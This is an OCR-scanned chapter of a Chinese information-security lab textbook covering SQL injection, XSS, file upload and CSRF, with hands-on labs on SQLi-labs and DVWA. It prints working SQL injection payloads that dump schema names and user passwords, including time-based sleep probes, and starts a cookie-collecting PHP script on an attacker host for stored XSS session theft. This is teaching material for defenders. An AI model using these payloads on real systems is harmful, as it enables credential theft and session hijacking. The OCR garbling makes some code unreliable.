2. 联合 查询 (Union Queries) 

重 言 式 攻击 一 般 用 于 绕 过 认证 ,但 对 于 窃取 信息 灵活 性 不 足 。 而 联合 查询 则 是 一 种 
更 为 精巧 的 攻击 方式 ,攻击 者 输入 "Union < 查询 语句 >” 来 获得 特定 数据 表 中 的 信息 。 这 
种 攻击 的 输出 是 Union 之 后 的 查询 语句 执行 所 获得 的 数据 集合 。 联 合 查 询 攻 击 能 奏效 
的 前 提 是 数据 库 中 查询 的 数据 会 显示 在 屏幕 上 。 

з. 基于 错误 信息 利用 的 SQL 注入 (Error_based SQL Injection) 

当 数 据 库 查询 信息 不 显示 在 屏幕 上 时 就 无 法 使 用 联合 查询 注入 来 获取 数据 库 信息 
了 ,这 时 可 以 尝试 基于 错误 信息 利用 的 SQL 注入 攻击 .精心 构造 能 导致 系统 出 错 的 SQL 
注入 语句 。 如 果 Web 应 用 没有 屏蔽 数据 库 返 回 的 错误 信息 , 则 通过 具有 提示 性 的 异常 出 
错 信息 ,获得 数据 库 系统 内 部 的 相应 信息 。 
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4. 盲 注 (Blind SQL Injection? 

当 数 据 库 查询 的 结果 不 显示 在 屏幕 上 , 且 数 据 库 返回 的 错误 信息 被 Web 应 用 系统 屏 
蔽 了 ,前 面 所 述 的 联合 查询 .基于 错误 信息 利用 的 SQL 注入 方式 都 无 法 获取 数据 库 中 的 
信息 。 在 这 种 情况 下 ,可 以 采用 盲 注 。 盲 注 又 分 为 两 种 : 基于 布尔 的 盲 注 (Boolean | 
based SQL Injection) 和 基于 时 间 的 盲 注 (Time_based SQL Injection) 。 

1) 基于 布尔 的 盲 注 (Boolean_based SQL Injection) 

如 果 经 测试 发 现 系 统 对 于 SQL 条 件 表达 式 的 不 同 取 值 ( 真 或 假 ) 返 回 不 同 的 页 面 ,可 
以 构造 基于 布尔 的 盲 注 ,根据 返回 的 页 面 情况 判断 注入 条 件 表达 式 的 值 为 真 还 是 为 假 。 

2) 基于 时 间 的 盲 注 (Time_based SQL Injection) 

在 上 述 所 有 SQL 注 和 方法 无 法 奏效 的 情况 下 ,可 以 采用 基于 时 间 的 盲 注 。 在 注入 请 
句 中 构造 条 件 表 达 式 ,并 根据 表达 式 的 值 ( 真 或 假 ) 让 系统 做 出 延迟 响应 或 立即 响应 ,用 户 
根据 系统 响应 是 否 延迟 ,判断 条 件 表 达 式 的 值 。 


11.2.2 XSS 跨 站 脚本 攻击 


跨 站 脚本 漏洞 (Cross-site scripting,xxs) 是 一 种 针对 Web 应 用 程序 的 安全 漏洞 。 它 
一 般 指 的 是 利用 网 页 开发 时 留 下 的 安全 漏洞 ,使 用 特殊 的 方法 将 恶意 JavaScript 代码 注 
入 网 页 中 ,用 户 不 知 不 觉 中 加 载 并 执行 攻击 者 构造 的 恶意 JavaScript 代码 。 当 攻击 成 功 
后 ,攻击 者 可 能 执行 下 列 操作 : HEE .钓鱼 .获取 私密 网 页 内 容 ,劫持 用 户 Web 行为 、. 盗 取 
会 话 和 cookie 等 。 大 量 的 网 站 曾经 遭受 KSS 漏洞 攻击 或 被 发 现 此 类 漏洞 ,如 Twitter, 
Facebook , MySpace 新浪 微 博 和 百度 贴吧 。 

构成 跨 站 脚本 漏洞 的 主要 原因 是 很 多 网 站 提供 了 用 户 交 互 的 页 面 ,如 检索 、 留 言 本 、 
论坛 等 ,凡是 能 够 提供 信息 输入 ,同时 又 会 将 提交 信息 作为 网 站 页 面 内 容 输 出 的 地 方 都 可 
能 存在 跨 站 脚本 漏洞 ,服务 器 程序 对 输入 信息 检查 不 严格 导致 了 脚本 嵌入 的 可 能 。 

XSS 漏洞 有 3 类 : 反射 型 XSS( 也 叫 非 持久 型 XSS 漏洞 )、 存 储 型 XSS 和 DOM 
型 XSS。 

1) 反射 型 XSS 

反射 型 XSS 是 最 常用 ,也 是 使 用 最 广泛 的 一 种 攻击 方式 , 它 通过 给 别人 发 送 带 有 恶 
意 脚本 代码 参数 的 URL 进行 攻击 , 当 URL 地 址 被 打开 时 ,特有 的 恶意 代码 参数 被 
HTML 解析 、 执 行 。 它 的 特点 是 非 持 久 化 .用户 必须 单 击 带 有 特定 参数 的 链接 才能 引起 。 
比如 有 以 下 index. php ИЙ: 

«?php 

$ username = $ GET["name"]; 

echo "<p> 欢 迎 您 ,". $ username. "!</p>"; 

?> 

正常 情况 下 ,用 户 会 在 URL 中 提交 参数 name 的 值 作为 自己 的 姓名 ,然后 该 数据 内 
容 会 通过 以 上 代码 在 页 面 中 展示 ,如 用 户 提 交 姓 名 为 “ 张 三 ”, 完 整 的 URL 地 址 如 下 : 


http://localhost/test. php?name = 张 三 
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http: //1ocalhost/test php?name-9Kk— — Windows Internet ЕЕЕ 


GO -i mm 1. 


在 浏览 器 中 访问 时 ,会 显示 如 图 11.2 所 示 内 容 。 


图 11.2 正常 访问 界面 


此 时 ,因为 用 户 输入 的 数据 信息 为 正常 数据 信息 ,经 过 脚本 处 理 以 后 页 面 反 馈 的 源码 
内 容 为 <p > 欢迎 您 , К<! </p>。 但 是 如 果 用 户 提 交 的 数据 中 包含 可 能 被 浏览 器 执行 
的 代码 的 话 , 会 是 一 种 什么 情况 呢 ? 我 们 继续 提交 name 的 值 为 < script > alert(/ 我 的 名 
字 是 张 三 /) </script >, 即 完 整 的 URL 地 址 为 http://localhost/test. php? name = 
€ script > alert(/ 我 的 名 字 是 张 三 /)</script >。 

在 浏览 器 中 访问 时 ,我们 发 现 会 有 弹 窗 提示 ,如 图 11. 3 所 示 。 


图 11.3 运行 脚本 界面 


那么 此 时 页 面 的 源码 又 是 什么 情况 呢 ? 

源码 变 成 了 “< p > 欢迎 您 ,< script > alert(/ 我 的 名 字 是 张 三 /)</script >!</р >”, M 
源 代码 中 我 们 发 现 ,用 户 输入 的 数据 中 ,< script > 与 </script > 标签 中 的 代码 被 浏览 器 执 
行 了 ,而 这 并 不 是 网 页 脚本 程序 想 要 的 结果 。 这 个 例子 正 是 最 简单 的 一 种 KSS 跨 站 脚本 
攻击 的 形式 , 称 之 为 反射 型 XSS。 

2) 存储 型 XSS 

存储 型 KSS 又 称 为 永久 性 XSS, 它 的 危害 更 大 , 它 与 反射 型 XSS 漏洞 的 区 别 在 于 ， 
它 提 交 的 XSS 代码 会 存储 在 服务 器 中 ,有 可 能 存在 于 数据 库 中 ,也 有 可 能 存在 于 文件 系 
统 中 , 当 其 他 用 户 请 求 带 有 这 个 注入 XSS 代码 的 网 页 时 就 会 下 载 并 执行 它 。 最 典型 的 例 
子 就 是 留言 板 XSS ,用户 提 交 一 条 包含 XSS 代码 的 留言 存储 到 数据 库 , 目标 用 户 查 看 留 
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言 板 时 ,那些 留言 的 内 容 会 从 数据 库 查 询 出 来 并 显示 ,浏览 器 发 现 有 XSS 代码 ,就 当 作 
HTML 和 JavaScript 代码 解析 执行 ,于 是 就 触发 了 XSS 攻击 。 存 储 型 KSS 的 攻击 是 很 
隐蔽 的 ,不 容易 通过 手工 查询 发 现 , 需 要 采用 自动 化 的 Web 应 用 漏洞 扫描 器 。 


11.2.3 文件 上 传 漏洞 


如 果 Web 应 用 对 上 传 的 文件 检查 不 周 ,那么 上 传 的 可 执行 脚本 文件 能 够 通过 其 获得 
执行 服务 器 端 命令 的 能 力 , 这 样 就 形成 了 文件 上 传 漏洞 。 文 件 上 传 漏洞 攻击 的 危害 非常 
大 ,攻击 者 甚至 可 以 利用 该 漏洞 控制 网 站 。 文 件 上 传 漏洞 具备 三 个 条 件 : 一 是 Web 应 用 
没有 对 上 传 的 文件 进行 严格 检查 ,使 攻击 者 可 以 上 传 脚本 文件 ,如 PHP 程序 文件 等 ; 二 
是 上 传 文件 能 够 被 Web 服务 器 解释 执行 ,如 上 传 的 PHP 文件 能 够 被 解释 执行 等 ; 三 是 
攻击 者 能 够 通过 Web 访问 到 上 传 的 文件 。 


11.2.4” 跨 站 请 求 伪 造 攻击 


跨 站 请 求 伪造 攻击 是 一 种 XSS 跨 站 脚本 攻击 的 具体 应 用 ,其 利用 会 话机 制 的 漏洞 ， 
引诱 用 户 单 击 恶 意 网 页 ,而 在 恶意 网 页 中 包含 执行 代码 ,从 而 引发 攻击 。 用 户 在 浏览 网 站 
并 进行 一 些 重要 操作 时 ,网 站 一 般 通过 一 个 特殊 的 Cookie 标识 用 户 , 称 为 会 话 ID( 这 个 
ID 一 般 需 要 用 户 登 录 后 才能 够 产生 )。 当 用 户 进行 操作 时 ,会 发 送 包含 会 话 ID HTTP 
请 求 ,使 网 站 可 以 识别 用 户 ,攻击 者 在 诱骗 用 户 单 击 恶 意 网 页 时 ,一 般 已 在 恶意 网 页 中 包 
含 了 用 户 进行 某 些 操作 的 代码 ,从 而 能 够 冒充 用 户 完 成 操作 ,这 样 就 发 生 了 跨 站 请 求 伪造 
攻击 。 利 用 跨 站 请 求 伪 造 攻击 能 够 冒充 用 户 执 行 一 些 特 定 操 作 , 如 递交 银行 转账 数据 等 。 


11.3 实验 环境 


本 章 实验 环境 采用 两 个 Web 漏洞 学 习 系 统 : SQLi-labs 和 DVWA。 
11.3.1 SQLi-labs 


SQLi-labs 是 一 位 印度 程序 员 基于 MySQL 数据 库 用 PHP 语言 编写 的 SQL 注入 学 
习 软 件 , 软 件 共 提供 了 约 65 个 具有 SQL 注入 漏洞 的 PHP Web 应 用 系统 ,覆盖 包含 用 户 
输入 注入 、Cookie fi A TE A SERVER 变量 注入 的 一 阶 SQL 注入 漏洞 以 及 二 阶 SQL i 
入 漏洞 ,注入 用 例 包括 了 重 言 式 攻 击 、UNION 查询 、 多 语句 攻击 、 报 错 语句 攻击 、 盲 注 攻 
击 等 几乎 所 有 已 知 的 攻击 类 型 。 

可 以 从 网 址 https://github. com/Audi-1/sqli-labs 下 载 软件 ,软件 运行 环境 需要 
Apache、PHP、MySQL。 为 了 简化 起 见 , 在 Windows 环境 下 可 以 安装 XAMPP(Apache 十 
MySQL 十 PHP 十 PERL) 建 站 集成 软件 包 , 安 装 完成 后 将 之 前 下 载 的 SQLi-labs 解压 到 
XAMPP 安装 目录 中 的 htdocs 子 目录 下 ,修改 Sqli-labs/sql-connections 下 的 db-creds. 
inc 文件 中 的 MySQL 账号 和 密码 ,如 图 11. 4 Bros 。 

将 dbuser 和 dbpass 变量 的 值 修 改 为 你 的 MySQL 账号 和 密码 ,之 后 ,访问 http:// 
127.0. 0. l/sqli-labs. 出 现 如 图 11. 5 所 示 的 SQLi-labs 主 界面 , 单 击 “Setup/reset 
Database for labs” 链 接 ,进行 数据 库 的 创建 。 
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文件 四 REO SEV 插入 四 BEO HHH 
DEB SR A ceo % 


<?php 


//give your mysql connection username n password 
$dbuser = root’ : 

$dbpass -'': 

$dbname -"security": 

$host = 'localhost': 

$dbnamel = "challenges? 


?> 


图 11.4 修改 配置 文件 


J SQL zilla Firefox 
文件 (F) RAE EEV PLS) 45208) IAT) 帮助 (H) 
E sat injections [+] 


€ @ localhost’sali е|| - Goooe 月 + 


SQLi-LABS Page-1 (Basic Challenges) 


Setup/reset Database for labs 


Page-2 (Advanced Injections) 


Page-3 (Stacked Injections) 


Page-4 (Challenges) 


localhostisaliisql-connectionsisetup-db.php ш 


图 11.5 SQLi-labs 主 界面 


11.3.2 DVWAC(Damn Vulnerable Web Application) 


DVWA 也 是 一 个 PHP/MySQL 应 用 ,包含 了 各 类 Web 安全 漏洞 (包括 XSS, 文件 上 
传 .CSRF .命令 行 注 入 等 ) 和 防范 措施 ,能 够 帮助 学 习 者 更 好 地 理解 Web 应 用 安全 防范 的 
过 程 。 

从 https://github. com/ethicalhack3r/DVWA 下 载 DVWA 压缩 包 , 解 压 到 XAMPP 
安装 目录 中 的 htdocs 子 目录 下 , 接 下 来 需要 配置 连接 数据 库 , 进 入 DVWA/config 目录 ， 
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打开 config. inc. php 配置 文件 ,将 db user 和 db_passwd 修改 为 你 的 mysql 账号 和 密码 ， 
如 图 11.6 所 示 。 


XPO GRÉ) FEV AO ФО) 帮助 中 
DEB SAA ren % 


p 


$DBMS = "MySQL': 
*SDBNS = 'PGSQL': 


# Database variables 
Ф WARNING: The database specified under db database WILL BE ENTIRELY DELETED during setup. 
# Please use a database dedicated to ПУМА. 


УМА = аггау() 
$ DVVA[ 'db server' ] = 'localhost': 
ЗУМА 'db database ] = 'dvwa' 


$ DWAL 'db user' ] = "root': 
$ DWAL 'db passvord' ]=”'; 


* Only needed for PGSQL 
$ DWWA[ 'db port' ] = '5432'; 


图 11.6 修改 配置 文件 


之 后 访问 http://127. 0. 0. 1/dvwa/setup. php ,出 现 如 图 11.7 所 示 的 初始 化 界面 ， 
单 击 “Create/Reset Database” 选 项 ,初始 化 数据 库 。 


文件 (E) ӨЕ 查看 (V) ”历史 (S) 书签 (8) IAM) WHH) 
Bl Damn vulnerable Web App (DVWA) v1... | + 
€ ammer 7 v е) - Googie Р + * 


с л л м 
Database setup 


Click on the 'Create / Reset Database' button below to create or reset your database. If yc 
sure you have the correct user credentials in /config/config.inc.php 1 


If the database already exists, it will be cleared and the data will be reset. 


Backend Database: MySQL 


Create / Reset Database. 


图 11.7 初始 化 界面 


数据 库 初 始 化 完成 后 ,输入 http://127. 0. 0. 1/dvwa/index. php, 输 入 正确 的 用 户 
名 /口令 后 就 可 以 成 功 登 录 系 统 , 系 统 默认 的 管理 员 账 号 为 admin, 口 令 为 password。 


11.4 SQL 注入 实验 


11.4.1 实验 目的 
掌握 SQL 注入 的 基本 原理 .掌握 SQL 注入 攻击 的 基本 方法 。 
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11.4.2 实验 内 容 及 环境 


1. 实验 内 容 

采用 重 言 式 SQL 注入 、Union 注入 、 基 于 错误 信息 利用 的 SQL 注入 、 盲 注 ( 基 于 布尔 
的 盲 注 和 基于 时 间 的 盲 注 ) 等 几 种 注入 方式 实现 注入 攻击 。 

2. 实验 环境 

实验 拓扑 如 图 11. 8 所 示 ,实验 需要 主流 配置 计算 机 2 台 , 均 安装 Windows 7 操作 系 
统 , 其 中 一 人 台 作 为 攻击 机 ,IP 地 址 为 192. 168. 1. 140 , 另 一 台 作 为 Web 服务 器 ,IP 地 址 为 
192.168. 1. 66 ,安装 XAMPP, 部 署 SQLi-labs .DVWA 应 用 。 


Ы E e 
攻击 机 Web 服 务 器 
IP; 192.168.1.140 IP; 192.168.1.66 


图 11.8 实验 拓扑 图 


11.4.3 实验 步骤 


1. 重 言 式 SQL 注入 
CD 打开 浏览 器 ,输入 http://192. 168. 1. 66/sqli/Less-11/ ,出现 如 图 11. 9 所 示 的 登 
录 界 面 。 


test’ or 1=14 


图 11.9 用 户 登 录 界 面 


(2) 合法 用 户 输入 正确 的 用 户 名 /口令 ,可 以 正常 登录 。 

(3) 攻击 者 在 不 知道 合法 用 户 用 户 名 /口令 的 情况 下 ,在 Username 字段 输入 “test or 
1 二 1#”, 可 以 看 到 也 可 登录 成 功 ,并 且 是 以 Dumb 用 户 的 身份 登录 系统 ,如 图 11. 10 
所 示 。 

由 于 注入 语句 中 包含 重 言 式 “1 二 1”, 这 种 攻击 方式 为 重 言 式 攻击 ,可 以 绕 过 认证 。 请 
思考 , 当 用 户 注 入 上 述 语句 时 ,为 什么 是 以 Dumb 用 户 的 身份 登录 系统 的 。 

2. Union 注入 

在 上 例 中 ,利用 重 言 式 攻击 可 以 绕 过 认证 ,但 无 法 获取 数据 库 中 的 数据 ,如 果 需 要 获 
取 数 据 库 中 数据 信息 ,比如 从 用 户 表 中 获取 用 户 名 口令 信息 ,可 以 采用 Union 注入 方 
式 。 一 般 按 照 确定 数据 库 、 确 定 表 、 确 定 表 的 结构 、 获 取 数 据 4 个 步骤 进行 注入 。 我 们 以 
MySQL 为 例 介 绍 SQL 注入 方法 和 过 程 。MySQL 管理 的 数据 库 包 括 两 类 : 系统 数据 库 
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图 11.10 攻击 者 绕 过 认证 成 功 登录 


information_schema 和 用 户 数 据 库 , 系统 数据 库 中 的 表 SCHEMATA 存储 了 当前 
MySQL 管理 的 所 有 数据 库 信息 ; 表 TABLES 存储 了 系统 中 所 有 表 的 信息 ; Ж 
COLUMNS 存储 了 当前 系统 中 所 有 表 的 列 信息 ,利用 SQL 注入 依次 获取 系统 数据 库 中 
的 这 些 信 息 可 以 最 终 达 到 获取 用 户 数据 库 中 数据 的 目标 

(1) 打开 浏览 器 ,输入 “http://192. 168. 1. 66/sqli/Less-11/”, 在 出 现 的 登录 界面 的 


Username 表单 中 输入 “test' union select 1,group_concat(schema_name) from information 


i Submit 按钮 后 可 以 看 到 屏幕 上 “Your password:” 提 示 符 后 


schema. schemata#”, 单 


Welcome Dhakkan 


Your Password:information_schema,cdcol,challenges,dvwa.mysql,performance_schema,phpmyadmin,security,test, webauth 


SUCCES 
LOGGED IN 


图 11.11 通过 SQL 注入 获取 数据 库 名 称 
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用 户 输入 的 Username 信息 传递 给 Web 服务 器 后 构建 的 SQL 语句 如 下 所 示 : 


SELECT username, password FROM users WHERE username = 'test' union select 1, group concat 

(schema name) from information schema. schemata # ' and password = ' $ passwd' LIMIT 0,1 

EER SQL 语句 中 ,注释 符 “#” 绕 过 了 对 password 的 检查 ,其 实质 是 由 两 个 
SELECT 查询 语句 通过 union 连接 ,由 于 系统 中 不 存在 test 用 户 , 前 一 个 SELECT 查询 
语句 的 结果 集 为 空 ,因而 整个 SQL 语句 的 执行 结果 来 自 第 二 个 SELECT 语句 ,第 二 个 
SELECT 语句 通过 group_concat 困 数 将 所 有 数据 库 名 称 串 接 成 一 个 字符 串 ,作为 整个 
SQL 语句 的 结果 。 

(2) 由 于 应 用 sqli-labs 的 数据 存储 在 security 中 ,下 面 我 们 再 通过 注入 获取 security 
数据 库 中 的 所 有 表 名 ,在 Username 表单 中 输入 “test' union select 1,group_concat(table_ 
name) from information schema. tables where table_schema= 'security' # ”, 单 击 Submit 
按钮 后 可 以 看 到 屏幕 上 输出 了 security 数据 库 中 的 所 有 表 名 称 信 息 , 如 图 11. 12 
所 示 。 


Сее Error Based: String h-B- 


Welcome Dhakkan 


SUCCESSFULLY 
LOGGED IN 


图 11.12 通过 SQL 注入 获取 表 的 名 称 


(3) 从 图 11. 12 可 以 看 出 ,security 数据 库 中 包括 了 emails, referers, uagents, users 
表 , 由 于 我 们 要 获取 所 有 合法 用 户 名 ,口令 信息 ,这 些 信息 应 该 存储 在 表 users 中 ,下 面 我 
们 再 通过 注入 获取 user 表 的 结构 信息 , 即 该 表 由 哪些 列 组 成 ,在 Username 表单 中 输入 
“test' union select 1.group concat(column name) from information schema. columns 
where table name- 'users'andtable schema- 'security' € ". #1 Submit 按钮 后 可 以 看 
到 屏幕 上 输出 了 users 表 中 的 所 有 列 名 称 信息 。 

(4) 从 图 11. 13 可 以 看 出 ,user 表 中 包括 了 id、username、password 列 , 已 知 了 这 些 
信息 我 们 再 通过 注入 就 可 获取 表 中 存储 的 所 有 合法 用 户 信 息 。 在 Username 表单 中 输入 


“test' union SELECT 1,group_concat(username, '|', password) FROM users #”, 单 击 
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[E] tess-11- Error Based- String h-gB-c 


Welcome Dhakkan 


Your Login name:1 
Your Password:id.username.password 


SUCCESSFULLY 
LOGGED IN 


图 11.13 通过 SQL 注入 获取 表 中 列 的 名 称 


Submit 按钮 后 可 以 看 到 屏幕 上 输出 了 users 表 中 的 所 有 合法 用 户 信息 。 通 过 SQL 注入 
获取 表 中 数据 如 图 11. 14 所 示 。 


@ Less-11- Error Based- Sting -Ge 


(еши: 
"m Аа = 
шл ror Bard: So h-B-c9- na. etor 


SUCCESSFULLY 
LOGGED IN 


到 11.14 通过 SQL 注入 获取 表 中 数据 


з. 基于 错误 信息 利用 的 SQL 注入 
上 述 例 子 中 用 户 输入 的 信息 传递 给 Web 应 用 系统 之 后 组 合成 SQL 语句 发 送 给 数据 
:管理 系统 ,数据 库 管理 系统 查询 的 信息 最 终 会 显示 在 屏幕 上 ,在 这 种 情况 下 ,可 以 采用 
Union 注入 ,通过 精心 设计 Union 关键 字 后 紧 跟 的 SQL 语句 使 得 用 户 想 要 获取 的 信息 显 
示 在 屏幕 上 ,从 而 窥探 到 数据 库 内 部 信息 。 但 有 时 ,数据库 执行 的 结果 并 不 会 显示 在 屏幕 
上 ,在 这 种 情况 下 ,就 不 能 使 用 Union 注入 获取 信息 了 ,我 们 可 以 尝试 采用 其 他 注入 方 
法 ,本 例 我 们 采用 基于 错误 信息 利用 的 SQL 注入 。 
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(1) 打开 浏览 器 ,输入 “http://192. 168. 1. 66/sqli/Less-5/? id 二 1”, 在 URL 中 “?” 
后 紧 跟 的 参数 “ID 二 1” 最 终 会 传递 给 Web 服务 器 ,构成 SQL 查询 条 件 , 也 即 查询 ID— 1 
的 用 户 信 息 ,执行 结果 如 图 11.15 所 示 。 


@ Less-5 Double Query- Single Quales Sting - Windows me 
57 8 ttp//192.168.1.66/sqi/Les 1 


Welcome  Dhakk 
You аге in.... 


SQLI DUMB SERIES-5 


图 11.15 Less-5 主 界面 


(2) 在 Less-5 中 ,SQL 语句 执行 的 结果 信息 并 不 显示 在 屏幕 上 ,因而 无 法 采用 
Union 注入 攻击 ,如果 在 参数 上 添加 单 引 号 ,这 相 drfd Web 应 用 系统 构建 的 SQL 
语句 的 语法 出 错 。 我 们 发 现 屏 幕 上 出 现 了 非常 详细 的 数据 库 返回 的 错误 信息 ,如 图 11.16 
所 示 ,由 此 可 见 Web 应 用 系统 并 没有 屏蔽 数据 库 返 回 的 错误 信息 ,因而 可 以 利用 基于 错 


误 信 息 的 SQL 注入 方法 。 


| 


- Iao-1 


You have an error in your SQL syntax; check the manual that corr our MySQL server version for the right syntax to use near "1" LIMIT 0,1' at line 1 


SQLI DUMB SERIES-5 
图 11.16 应 用 程序 没有 屏蔽 数据 库 返 回 的 错误 信息 


G) 打开 浏览 器 ,输入 如 下 URL: http://192. 168. 1. 66/Less-5/index. php? id=1' 
and extractvalue (1, (select group_concat (schema, name) from information schema. 
schemata) ) 十。 从 屏幕 中 可 以 看 到 返回 了 错误 信息 ,并 且 错 误 信 息 中 包含 了 我 们 期 
望 获 取 的 数据 库 名 称 信息 ,如 图 11. 17 所 示 。 


жаш) IAT) WMA 
sle 


С ату 


图 11. 17 从 错误 信息 中 获取 有 用 信息 
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用 户 输入 的 信息 传递 给 Web 应 用 系统 后 所 构成 的 SQL 语句 为 : 


SELECT + FROM users WHERE id = '1' and extractvalue(1, (select group concat(schema name) from 

information schema.schemata)) - — + 'LIMIT 0,1 

其 中 “ 十 ”为 注释 符 , 由 于 “# ”在 URL 中 有 特殊 含义 ,因而 在 URL 中 不 能 用 作 
注释 符 。extractvalue (XML_document, XPath_string) 函数 是 MySQL 提供 的 用 于 从 
XML 文档 XML. document 中 返回 包含 查询 值 XPath_string 的 字符 串 , 其 中 XPath_ 
string 是 形 如 “/../.. ”的 XPath 类 型 的 路 径 ,我 们 提供 的 XPath_string 参数 值 显然 不 符 
合 这 种 语法 规范 ,会 引发 语法 错误 ,从 而 数据 库 会 报错 ,通过 精心 设计 XPath string 参数 
值 ,就 能 从 错误 信息 中 获取 有 用 的 信息 。 

4. 基于 布尔 的 盲 注 

利用 Union 注入 和 基于 错误 信息 利用 的 SQL 注入 都 能 够 直接 获取 数据 库 中 的 信 
息 ,是 攻击 者 首选 的 SQL 注入 方法 ,但 是 如 果 基 于 用 户 输 入 构建 的 SQL 语句 的 执行 结果 
不 在 屏幕 上 显示 , 且 Web 应 用 系统 屏蔽 了 数据 库 返回 的 错误 信息 ,这 两 种 方法 就 无 法 使 
用 了 。 这 时 可 以 尝试 采用 基于 布尔 的 盲 注 。 

基于 布尔 的 盲 注 无 法 直接 获取 数据 库 中 的 数据 , 它 是 一 种 推断 攻击 方式 。 这 种 攻击 
方式 在 输入 中 构造 SQL 查询 条 件 使 得 系统 对 这 些 查询 条 件 成 立 与 否 产生 不 同 的 反应 , 通 
过 观察 系统 的 不 同 反 应 ,获知 系统 内 部 信息 情况 。 这 种 攻击 手段 使 攻击 者 可 以 在 系统 不 
产生 返回 出 错 信息 或 命令 语句 执行 结果 的 条 件 下 ,实现 信息 窃取 的 攻击 目的 。 

(1) 打开 浏览 器 ,输入 “http://192. 168. 1. 66/sqli/Less-8/? id 二 1”, 出 现 如 图 11. 18 
所 示 的 界面 ,可 以 看 到 URL 中 的 参数 “id 三 1'” 构 建 的 SQL 语句 会 引发 语法 错误 ,但 屏幕 
上 并 没有 显示 数据 库 返 回 的 错误 信息 ,因而 无 法 利用 基于 错误 信息 的 SQL 注入 进行 
攻击 。 
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图 11.18 Web 应 用 屏 项 了 数据 库 返回 的 错误 信息 


(2) 打开 浏览 器 ,输入 “http://192. 168. 1. 66/sqli/Less-5/? id—1".Z2 Z&*id— 1" 484 
传递 给 SQL 语句 构成 条 件 表 达 式 ,实现 知道 “id 王 1? 为 真 (true) , 则 SQL 条 件 表达 式 为 真 
的 页 面 如 图 11. 19 所 示 。 

(3) 而 当 在 浏览 器 中 输入 http://192. 168. 1. 66/sqli/Less-8/? id— —1 时 ,出 现 的 
界面 如 图 11. 20 所 示 。 我 们 知道 通常 情况 下 id 的 值 不 可 能 为 负 ,“id 二 一 1” 构 成 的 SQL 
条 件 表达 式 为 假 (false)。 
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Г 11.19 SQL 条 件 表达 式 为 真 的 页 面 
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图 11.20 SQL 条 件 表达 式 为 假 的 页 面 


从 (2)、(3) 可 知 , 当 用 户 输 入 的 参数 构成 的 条 件 表达 式 为 true 和 false 时 返回 的 页 面 
不 相同 ,因而 可 以 根据 返回 的 页 面 判 断 攻击 者 猜测 的 信息 是 否 正确 。 如 为 了 获得 当前 数 
据 库 的 长 度 信息 ,可 在 浏览 T А “һр: //192. 168. 1. 66/sali/Less-8/? 14 = 1 'апа 
length(database()) = 1 " JA Br np A. 1 开始 不 断 递增 ,直到 返回 的 页 面 如 图 11. 19 
所 示 ,也 即 用 户 猜测 的 长 度 с. SQL 条 件 表达 式 为 true 为 止 ,根据 页 面 返回 的 情况 ,最 
终 获 取 到 当前 数据 库 的 长 度 

(4) 在 浏览 器 地 址 栏 中 输入 “http://192. 168. 1. 66/sqli/Less-8/? 14=1'апа left 
(database() ,1)>'a' +”, 根 据 页 面 返回 情况 可 以 猜测 当前 数据 库 名 称 的 第 一 个 字母 。 
以 此 类 推 ,按照 相同 的 方法 猜测 数据 库 名 称 、 表 的 名 称 、 表 中 列 的 名 称 。 

5. 基于 时 间 的 盲 注 

СТ) 分 别 在 浏览 器 地 址 栏 中 输入 “http://192. 168. 1. 66/sgli/Less-9/? id —1 和 
//192. 168. 1. 66/sqli/Less-9/? id 一 一 1”, 通 过 测试 我 们 会 发 现 无 论 用 户 输入 的 参 

数 id 的 值 正 确 与 否 , 返 回 的 页 面 都 一 样 , 因 而 无 法 使 用 基于 布尔 的 盲 注 , 这 时 可 以 使 用 基 

于 时 间 的 盲 注 。 攻 击 者 在 注入 语句 中 包含 条 件 式 时 间 推 断 命令 ,观察 后 台数 据 库 是 否 反 
应 延 时 ,从 而 得 知 条 件 式 成 立 与 否 ,以 此 推断 系统 内 部 信息 。 

(2) 打开 浏览 器 ,在 地 址 栏 中 输入 “http://192. 168. 1. 66/sqli/Less-9/? id = 
1%27and%20If(ascii(substr(database() .1,1)) 二 114,1,sleep(5)) 一 一 十 ”, 用 户 注 入 的 
语句 中 包括 了 IF 条件 表达 式 . 其 语法 格式 为 IF (expr.if_expr,if_false_expr) ,其 含义 为 


信息 系统 安全 实验 教程 


ШЖ expr 为 真 ,那么 IF 条 件 表达 式 返 回 if. expr 表达 式 的 值 ,否则 ,返回 if false expr Ж 
达 式 的 值 。 因 而 上 述 用 户 注 入 的 语句 的 含义 是 如 果 当 前 数据 库 的 第 一 个 字母 的 ascii 码 
值 为 114, 则 返回 值 为 1 ,否则 数据 库 延 迟 响应 5 秒 ,5 秒 后 返回 值 1。 因 而 通过 系统 的 反 
应 是 否 有 延迟 ,推断 当前 数据 库 名 称 的 第 一 个 字母 的 ascii 值 是 否 为 114。 我 们 知道 
SQLi-labs 的 数据 存储 在 security 数据 库 中 ,其 第 一 个 字母 为 s, 对 应 的 ascii 值 为 115, 因 
而 上 述 注入 语句 产生 的 效果 是 系统 延迟 5 秒 反 应 。 

根据 相似 的 注入 方式 ,通过 不 断 尝试 ,最 终 可 以 获取 数据 库 信 息 。 


11.5 XSS 攻击 实验 


11.5.1 实验 目的 
理解 KSS 跨 站 脚本 攻击 的 原理 .掌握 KSS 跨 站 脚本 攻击 的 基本 方法 。 
11.5.2 实验 内 容 及 环境 


1. 实验 内 容 

利用 DVWA 中 的 存储 型 KSS 漏洞 实现 窃取 受害 者 SessionID ,进而 冒充 受害 者 的 
身份 。 

2. 实验 环境 

实验 网 络 拓扑 如 图 11. 21 Bros ,需要 三 台 主 流 配置 计算 机 ,安装 Windows 7 操作 系 
统 , 分 别 充当 攻击 者 、 受 害 者 .Web 服务 器 角色 , IP 地 址 设置 如 图 11. 21 Bros ,其 中 Web 
服务 器 需要 安装 XAMPP, 部 署 DVWA 应 用 , 且 设 置 DVWA 的 安全 级 别 为 low; 攻击 机 
安装 KAMPP, ZX firefox 浏览 器 并 安装 抓 包 组 件 Live HTTP headers, 


攻击 机 Web 服 务 器 
ІР: 192.168.1.140 IP: 192.168.1.66 
Sessionld JavaScript 
受害 
IP: 192.168.1.33 


图 11.21 网 络 拓扑 


11.5.3 实验 步骤 
(1) 攻击 者 在 IP 地 址 为 192. 168. 1. 140 的 计算 机 上 事先 准备 好 一 个 网 站 ,可 用 
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XAMPP 构建 ,网 站 中 只 放置 一 个 网 页 getcookie. php, 其 主要 功能 是 从 URL 中 获取 URI 
信息 ,并 把 获取 的 信息 存储 在 当前 目录 下 的 cookie. txt 文件 中 ,getcookie. php 中 代码 如 
下 所 示 。 


«?php 
$ cookie= $ SERVER[ REQUEST URI']; 
$ fp = fopen( 'cookie. txt', 'a'); 
